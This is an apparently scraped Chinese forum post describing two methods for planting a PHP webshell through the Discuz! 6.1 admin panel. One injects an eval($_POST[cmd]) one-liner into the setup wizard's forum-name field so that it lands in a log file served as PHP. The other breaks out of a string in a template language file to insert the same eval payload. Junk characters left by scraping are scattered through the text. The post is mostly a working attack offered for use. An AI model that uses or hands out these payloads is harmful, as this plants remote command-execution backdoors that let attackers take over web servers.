discuz6.1后台拿shell方法

admin

discuz6.1两种方法后台拿shell
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
( l0 g) ], X3 f' j' h/ D2 }1:
4 \! `4 |* {0 [  F4 O! Chttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
8 u' P' G4 O& y" ]- K5 [, e) J<?php eval($_POST[cmd]);?>
后台webshell地址：http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php

0 w! n1 W2 W& b# ], c; }
' [5 H# [. W! {) A; L& P& X2:后台模板管理--默认模板套系--详情
4 t& A# s* ]& Y9 W! ttemplates/default/actions.lang.php
0 R# _  ^) p" Y1 M* b, `. cjhackj\\');eval($_POST[cmd])?>;//
' B8 W+ {9 V0 f0 F, P
利用很简单,聪明的人一看就懂了